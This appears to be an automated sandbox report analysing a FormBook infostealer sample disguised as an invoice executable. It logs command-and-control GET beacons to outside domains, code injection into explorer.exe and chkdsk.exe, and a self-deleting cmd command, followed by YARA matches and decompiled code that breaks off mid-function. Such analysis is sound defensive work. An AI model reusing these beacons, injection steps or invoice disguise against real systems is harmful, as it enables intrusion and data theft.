                                                location: https://www.theblockmeatstore.com/usvr?mN9d3vF=Hs%2FL2mJb%2FOvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S
                                                strict-transport-security: max-age=120
                                                x-wix-request-id: 1628507408.1188610990128361
                                                Age: 0
                                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgPdBW8RJ62fx7sKSwU92YH,qquldgcFrj2n046g4RNSVAWQdna/CCWMxoP3LZv2gTtYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRals4++uwHAXQpBhbuvqPxWy3vZv1k+LBTLMg8yyM9xq7C3fKEXQvQlSAkB/lstal9R5fAlRY0jC2L5OGIlRj9B9E=,2UNV7KOq4oGjA5+PKsX47Nx2kHk34KLdLhfaReITlNtYgeUJqUXtid+86vZww+nL,l7Ey5khejq81S7sxGe5Nkw7D1HyO44rvV4Lde0UjaKBXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,UCcefuQCi27dXmJSD6Vpi1qP7Tgu+Vqak21QefUo3ZpF30kdtaNgXD/yU00ghn6OyIcTh1vD7B7Cgnme8qjKMQ==
                                                Cache-Control: no-cache
                                                X-Content-Type-Options: nosniff
                                                Server: Pepyaka/1.19.10


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 2 | 192.168.2.5 | 49730 | 1.1.1.1 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 9, 2021 13:10:13.291455030 CEST | 6077 | OUT | GET /usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.quranvisor.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Aug 9, 2021 13:10:13.325337887 CEST | 6078 | IN | HTTP/1.1 409 Conflict
                                                Date: Mon, 09 Aug 2021 11:10:13 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 16
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Server: cloudflare
                                                CF-RAY: 67c089651cd242db-FRA
                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                Data Ascii: error code: 1001


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 3 | 192.168.2.5 | 49731 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 9, 2021 13:10:18.498845100 CEST | 6079 | OUT | GET /usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.unusualdog.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Aug 9, 2021 13:10:18.611226082 CEST | 6080 | IN | HTTP/1.1 400 Bad Request
                                                Cache-Control: no-cache, must-revalidate
                                                Content-Length: 77564
                                                Content-Type: text/html; charset=UTF-8
                                                Date: Mon, 09 Aug 2021 11:10:18 UTC
                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                Pragma: no-cache
                                                Server: Squarespace
                                                X-Contextid: zvZl3MMB/7K8PFz4j
                                                Connection: close
                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 4 | 192.168.2.5 | 49732 | 52.20.84.62 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 9, 2021 13:10:23.928457975 CEST | 6118 | OUT | GET /usvr/?mN9d3vF=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.microprojects.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Aug 9, 2021 13:10:24.065283060 CEST | 6119 | IN | HTTP/1.1 404 Not Found
                                                Server: openresty
                                                Date: Mon, 09 Aug 2021 11:10:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0


                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                 5 | 192.168.2.5 | 49733 | 85.13.128.31 | 80 | C:\Windows\explorer.exe
                                                 Timestamp | kBytes transferred | Direction | Data
                                                 Aug 9, 2021 13:10:29.212502003 CEST | 6120 | OUT | GET /usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1
                                                Host: www.bavarian-luxury.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                 Aug 9, 2021 13:10:29.250288963 CEST | 6120 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 09 Aug 2021 11:10:29 GMT
                                                Server: Apache
                                                Content-Length: 196
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                Code Manipulations

                                                Statistics

                                                CPU Usage


                                                Memory Usage


                                                High Level Behavior Distribution


                                                Behavior


                                                System Behavior

                                                General

                                                Start time:13:08:33
                                                Start date:09/08/2021
                                                Path:C:\Users\user\Desktop\INVOICE_90990_PDF.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
                                                Imagebase:0x400000
                                                File size:304901 bytes
                                                MD5 hash:3E94BEE073A286E8B446E87A126DDE1E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:13:08:34
                                                Start date:09/08/2021
                                                Path:C:\Users\user\Desktop\INVOICE_90990_PDF.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
                                                Imagebase:0x400000
                                                File size:304901 bytes
                                                MD5 hash:3E94BEE073A286E8B446E87A126DDE1E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:13:08:38
                                                Start date:09/08/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff693d90000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:13:09:07
                                                Start date:09/08/2021
                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                Imagebase:0xf10000
                                                File size:851968 bytes
                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                General

                                                Start time:13:09:13
                                                Start date:09/08/2021
                                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                Imagebase:0x2b0000
                                                File size:23040 bytes
                                                MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Start time:13:09:15
                                                Start date:09/08/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe'
                                                Imagebase:0x150000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:13:09:16
                                                Start date:09/08/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6915b0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis


                                                  Executed Functions

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021F07B4
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021F07DE
                                                  • ReadFile.KERNELBASE(00000000,00000000,021F026C,?,00000000), ref: 021F07F5
                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021F0817
                                                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021F01AE,7FDFFF66), ref: 021F088A
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021F0895
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021F01AE), ref: 021F08E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.234279906.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                  • Instruction ID: fa026aa76c971e5b05c7773f26f4cf3c70af6c0ee620cd547e4a139eeecca4e9
                                                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                  • Instruction Fuzzy Hash: 5861A174E40708ABCB50DFA4C880BAEB7B6AF4C710F148069E625EB396E7349D41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403019() {
                                                  				_Unknown_base(*)()* _t1;
                                                  
                                                  				_t1 = SetUnhandledExceptionFilter(E00403025); // executed
                                                  				return _t1;
                                                  			}

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNELBASE(Function_00003025,00402989), ref: 0040301E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.233954692.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.233945743.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233967293.000000000040F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.233975894.0000000000415000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.233984140.0000000000418000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 07ca0ebe614cf4b4898eab6ac77fa8a71f1dcbcb66f23ab2edaa1f53d3837756
                                                  • Instruction ID: 078e50a1ba230bc3ff970d1ec26e00b271efa9b8dbf7e9ea61bee460832fafba
                                                  • Opcode Fuzzy Hash: 07ca0ebe614cf4b4898eab6ac77fa8a71f1dcbcb66f23ab2edaa1f53d3837756
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E00401630() {
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				PWCHAR* _v16;
                                                  				WCHAR* _v20;
                                                  				void* _v24;
                                                  				char _v27;
                                                  				char _v28;
                                                  				char _v29;
                                                  				char _v30;
                                                  				char _v31;
                                                  				char _v32;
                                                  				char _v33;
                                                  				char _v34;
                                                  				char _v35;
                                                  				char _v36;
                                                  				char _v37;
                                                  				char _v38;
                                                  				char _v39;
                                                  				char _v40;
                                                  				char _v41;
                                                  				char _v42;
                                                  				char _v43;
                                                  				char _v44;
                                                  				char _v45;
                                                  				char _v46;
                                                  				char _v47;
                                                  				char _v48;
                                                  				char _v49;
                                                  				char _v50;
                                                  				char _v51;
                                                  				char _v52;
                                                  				char _v53;
                                                  				char _v54;
                                                  				char _v55;
                                                  				char _v56;
                                                  				char _v57;
                                                  				char _v58;
                                                  				char _v59;
                                                  				char _v60;
                                                  				char _v61;
                                                  				char _v62;
                                                  				char _v63;
                                                  				char _v64;
                                                  				char _v65;
                                                  				char _v66;
                                                  				char _v67;
                                                  				char _v68;
                                                  				char _v69;
                                                  				char _v70;
                                                  				char _v71;
                                                  				char _v72;
                                                  				char _v73;
                                                  				char _v74;
                                                  				char _v75;
                                                  				char _v76;
                                                  				char _v77;
                                                  				char _v78;
                                                  				char _v79;
                                                  				char _v80;
                                                  				char _v81;
                                                  				char _v82;
                                                  				char _v83;
                                                  				char _v84;
                                                  				char _v85;
                                                  				char _v86;
                                                  				char _v87;
                                                  				char _v88;
                                                  				char _v89;
                                                  				char _v90;
                                                  				char _v91;
                                                  				char _v92;
                                                  				char _v93;
                                                  				char _v94;
                                                  				char _v95;
                                                  				char _v96;
                                                  				char _v97;
                                                  				char _v98;
                                                  				char _v99;
                                                  				char _v100;
                                                  				char _v101;
                                                  				char _v102;
                                                  				char _v103;
                                                  				char _v104;
                                                  				char _v105;
                                                  				char _v106;
                                                  				char _v107;
                                                  				char _v108;
                                                  				char _v109;
                                                  				char _v110;
                                                  				char _v111;
                                                  				char _v112;
                                                  				char _v113;
                                                  				char _v114;
                                                  				char _v115;
                                                  				char _v116;
                                                  				char _v117;
                                                  				char _v118;
                                                  				char _v119;
                                                  				char _v120;
                                                  				char _v121;
                                                  				char _v122;
                                                  				char _v123;
                                                  				char _v124;
                                                  				char _v125;
                                                  				char _v126;
                                                  				char _v127;
                                                  				char _v128;
                                                  				char _v129;
                                                  				char _v130;
                                                  				char _v131;
                                                  				char _v132;
                                                  				char _v133;
                                                  				char _v134;
                                                  				char _v135;
                                                  				char _v136;
                                                  				char _v137;
                                                  				char _v138;
                                                  				char _v139;
                                                  				char _v140;
                                                  				char _v141;
                                                  				char _v142;
                                                  				char _v143;
                                                  				char _v144;
                                                  				char _v145;
                                                  				char _v146;
                                                  				char _v147;
                                                  				char _v148;
                                                  				char _v149;
                                                  				char _v150;
                                                  				char _v151;
                                                  				char _v152;
                                                  				char _v153;
                                                  				char _v154;
                                                  				char _v155;
                                                  				char _v156;
                                                  				char _v157;
                                                  				char _v158;
                                                  				char _v159;
                                                  				char _v160;
                                                  				char _v161;
                                                  				char _v162;
                                                  				char _v163;
                                                  				char _v164;
                                                  				char _v165;
                                                  				char _v166;
                                                  				char _v167;
                                                  				char _v168;
                                                  				char _v169;
                                                  				char _v170;
                                                  				char _v171;
                                                  				char _v172;
                                                  				char _v173;
                                                  				char _v174;
                                                  				char _v175;
                                                  				char _v176;
                                                  				char _v177;
                                                  				char _v178;
                                                  				char _v179;
                                                  				char _v180;
                                                  				char _v181;
                                                  				char _v182;
                                                  				char _v183;
                                                  				char _v184;
                                                  				char _v185;
                                                  				char _v186;
                                                  				char _v187;
                                                  				char _v188;
                                                  				char _v189;
                                                  				char _v190;
                                                  				char _v191;
                                                  				char _v192;
                                                  				char _v193;
                                                  				char _v194;
                                                  				char _v195;
                                                  				char _v196;
                                                  				char _v197;
                                                  				char _v198;
                                                  				char _v199;
                                                  				char _v200;
                                                  				char _v201;
                                                  				char _v202;
                                                  				char _v203;
                                                  				char _v204;
                                                  				char _v205;
                                                  				char _v206;
                                                  				char _v207;
                                                  				char _v208;
                                                  				char _v209;
                                                  				char _v210;
                                                  				char _v211;
                                                  				char _v212;
                                                  				char _v213;
                                                  				char _v214;
                                                  				char _v215;
                                                  				char _v216;
                                                  				char _v217;
                                                  				char _v218;
                                                  				char _v219;
                                                  				char _v220;
                                                  				char _v221;
                                                  				char _v222;
                                                  				char _v223;
                                                  				char _v224;
                                                  				char _v225;
                                                  				char _v226;
                                                  				char _v227;
                                                  				char _v228;
                                                  				char _v229;
                                                  				char _v230;
                                                  				char _v231;
                                                  				char _v232;
                                                  				char _v233;
                                                  				char _v234;
                                                  				char _v235;
                                                  				char _v236;
                                                  				char _v237;
                                                  				char _v238;
                                                  				char _v239;
                                                  				char _v240;
                                                  				char _v241;
                                                  				char _v242;
                                                  				char _v243;
                                                  				char _v244;
                                                  				char _v245;
                                                  				char _v246;
                                                  				char _v247;
                                                  				char _v248;
                                                  				char _v249;
                                                  				char _v250;
                                                  				char _v251;
                                                  				char _v252;
                                                  				char _v253;
                                                  				char _v254;
                                                  				char _v255;
                                                  				char _v256;
                                                  				char _v257;
                                                  				char _v258;
                                                  				char _v259;
                                                  				char _v260;
                                                  				char _v261;
                                                  				char _v262;
                                                  				char _v263;
                                                  				char _v264;
                                                  				char _v265;
                                                  				char _v266;
                                                  				char _v267;
                                                  				char _v268;
                                                  				char _v269;
                                                  				char _v270;
                                                  				char _v271;
                                                  				char _v272;
                                                  				char _v273;
                                                  				char _v274;
                                                  				char _v275;
                                                  				char _v276;
                                                  				char _v277;
                                                  				char _v278;
                                                  				char _v279;
                                                  				char _v280;
                                                  				char _v281;
                                                  				char _v282;
                                                  				char _v283;
                                                  				char _v284;
                                                  				char _v285;
                                                  				char _v286;
                                                  				char _v287;
                                                  				char _v288;
                                                  				char _v289;
                                                  				char _v290;
                                                  				char _v291;
                                                  				char _v292;
                                                  				char _v293;
                                                  				char _v294;
                                                  				char _v295;
                                                  				char _v296;
                                                  				char _v297;
                                                  				char _v298;
                                                  				char _v299;
                                                  				char _v300;
                                                  				char _v301;
                                                  				char _v302;
                                                  				char _v303;
                                                  				char _v304;
                                                  				char _v305;
                                                  				char _v306;
                                                  				char _v307;
                                                  				char _v308;
                                                  				char _v309;
                                                  				char _v310;
                                                  				char _v311;
                                                  				char _v312;
                                                  				char _v313;
                                                  				char _v314;
                                                  				char _v315;
                                                  				char _v316;
                                                  				char _v317;
                                                  				char _v318;
                                                  				char _v319;
                                                  				char _v320;
                                                  				char _v321;
                                                  				char _v322;
                                                  				char _v323;
                                                  				char _v324;
                                                  				char _v325;
                                                  				char _v326;
                                                  				char _v327;
                                                  				char _v328;
                                                  				char _v329;
                                                  				char _v330;
                                                  				char _v331;
                                                  				char _v332;
                                                  				char _v333;
                                                  				char _v334;
                                                  				char _v335;
                                                  				char _v336;
                                                  				char _v337;
                                                  				char _v338;
                                                  				char _v339;
                                                  				char _v340;
                                                  				char _v341;
                                                  				char _v342;
                                                  				char _v343;
                                                  				char _v344;
                                                  				char _v345;
                                                  				char _v346;
                                                  				char _v347;
                                                  				char _v348;
                                                  				char _v349;
                                                  				char _v350;
                                                  				char _v351;
                                                  				char _v352;
                                                  				char _v353;
                                                  				char _v354;
                                                  				char _v355;
                                                  				char _v356;
                                                  				char _v357;
                                                  				char _v358;
                                                  				char _v359;
                                                  				char _v360;
                                                  				char _v361;
                                                  				char _v362;
                                                  				char _v363;
                                                  				char _v364;
                                                  				char _v365;
                                                  				char _v366;
                                                  				char _v367;
                                                  				char _v368;
                                                  				char _v369;
                                                  				char _v370;
                                                  				char _v371;
                                                  				char _v372;
                                                  				char _v373;
                                                  				char _v374;
                                                  				char _v375;
                                                  				char _v376;
                                                  				char _v377;
                                                  				char _v378;
                                                  				char _v379;
                                                  				char _v380;
                                                  				char _v381;
                                                  				char _v382;
                                                  				char _v383;
                                                  				char _v384;
                                                  				char _v385;
                                                  				char _v386;
                                                  				char _v387;
                                                  				char _v388;
                                                  				char _v389;
                                                  				char _v390;
                                                  				char _v391;
                                                  				char _v392;
                                                  				char _v393;
                                                  				char _v394;
                                                  				char _v395;
                                                  				char _v396;
                                                  				char _v397;
                                                  				char _v398;
                                                  				char _v399;
                                                  				char _v400;
                                                  				char _v401;
                                                  				char _v402;
                                                  				char _v403;
                                                  				char _v404;
                                                  				char _v405;
                                                  				char _v406;
                                                  				char _v407;
                                                  				char _v408;
                                                  				char _v409;
                                                  				char _v410;
                                                  				char _v411;
                                                  				char _v412;
                                                  				char _v413;
                                                  				char _v414;
                                                  				char _v415;
                                                  				char _v416;
                                                  				char _v417;
                                                  				char _v418;
                                                  				char _v419;
                                                  				char _v420;
                                                  				char _v421;
                                                  				char _v422;
                                                  				char _v423;
                                                  				char _v424;
                                                  				char _v425;
                                                  				char _v426;
                                                  				char _v427;
                                                  				char _v428;
                                                  				char _v429;
                                                  				char _v430;
                                                  				char _v431;
                                                  				char _v432;
                                                  				char _v433;
                                                  				char _v434;
                                                  				char _v435;
                                                  				char _v436;
                                                  				char _v437;
                                                  				char _v438;
                                                  				char _v439;
                                                  				char _v440;
                                                  				char _v441;
                                                  				char _v442;
                                                  				char _v443;
                                                  				char _v444;
                                                  				char _v445;
                                                  				char _v446;
                                                  				char _v447;
                                                  				char _v448;
                                                  				char _v449;
                                                  				char _v450;
                                                  				char _v451;
                                                  				char _v452;
                                                  				char _v453;
                                                  				char _v454;
                                                  				char _v455;
                                                  				char _v456;
                                                  				char _v457;
                                                  				char _v458;
                                                  				char _v459;
                                                  				char _v460;
                                                  				char _v461;
                                                  				char _v462;
                                                  				char _v463;
                                                  				char _v464;
                                                  				char _v465;
                                                  				char _v466;
                                                  				char _v467;
                                                  				char _v468;
                                                  				char _v469;
                                                  				char _v470;
                                                  				char _v471;
                                                  				char _v472;
                                                  				char _v473;
                                                  				char _v474;
                                                  				char _v475;
                                                  				char _v476;
                                                  				char _v477;
                                                  				char _v478;
                                                  				char _v479;
                                                  				char _v480;
                                                  				char _v481;
                                                  				char _v482;
                                                  				char _v483;
                                                  				char _v484;
                                                  				char _v485;
                                                  				char _v486;
                                                  				char _v487;
                                                  				char _v488;
                                                  				char _v489;
                                                  				char _v490;
                                                  				char _v491;
                                                  				char _v492;
                                                  				char _v493;
                                                  				char _v494;
                                                  				char _v495;
                                                  				char _v496;
                                                  				char _v497;
                                                  				char _v498;
                                                  				char _v499;
                                                  				char _v500;
                                                  				char _v501;
                                                  				char _v502;
                                                  				char _v503;
                                                  				char _v504;
                                                  				char _v505;
                                                  				char _v506;
                                                  				char _v507;
                                                  				char _v508;
                                                  				char _v509;
                                                  				char _v510;
                                                  				char _v511;
                                                  				char _v512;
                                                  				char _v513;
                                                  				char _v514;
                                                  				char _v515;
                                                  				char _v516;
                                                  				char _v517;
                                                  				char _v518;
                                                  				char _v519;
                                                  				char _v520;
                                                  				char _v521;
                                                  				char _v522;
                                                  				char _v523;
                                                  				char _v524;
                                                  				char _v525;
                                                  				char _v526;
                                                  				char _v527;
                                                  				char _v528;
                                                  				char _v529;
                                                  				char _v530;
                                                  				char _v531;
                                                  				char _v532;
                                                  				char _v533;
                                                  				char _v534;
                                                  				char _v535;
                                                  				char _v536;
                                                  				char _v537;
                                                  				char _v538;
                                                  				char _v539;
                                                  				char _v540;
                                                  				char _v541;
                                                  				char _v542;
                                                  				char _v543;
                                                  				char _v544;
                                                  				char _v545;
                                                  				char _v546;
                                                  				char _v547;
                                                  				char _v548;
                                                  				char _v549;
                                                  				char _v550;
                                                  				char _v551;
                                                  				char _v552;
                                                  				char _v553;
                                                  				char _v554;
                                                  				char _v555;
                                                  				char _v556;
                                                  				char _v557;
                                                  				char _v558;
                                                  				char _v559;
                                                  				char _v560;
                                                  				char _v561;
                                                  				char _v562;
                                                  				char _v563;
                                                  				char _v564;
                                                  				char _v565;
                                                  				char _v566;
                                                  				char _v567;
                                                  				char _v568;
                                                  				char _v569;
                                                  				char _v570;
                                                  				char _v571;
                                                  				char _v572;
                                                  				char _v573;
                                                  				char _v574;
                                                  				char _v575;
                                                  				char _v576;
                                                  				char _v577;
                                                  				char _v578;
                                                  				char _v579;
                                                  				char _v580;
                                                  				char _v581;
                                                  				char _v582;
                                                  				char _v583;
                                                  				char _v584;
                                                  				char _v585;
                                                  				char _v586;
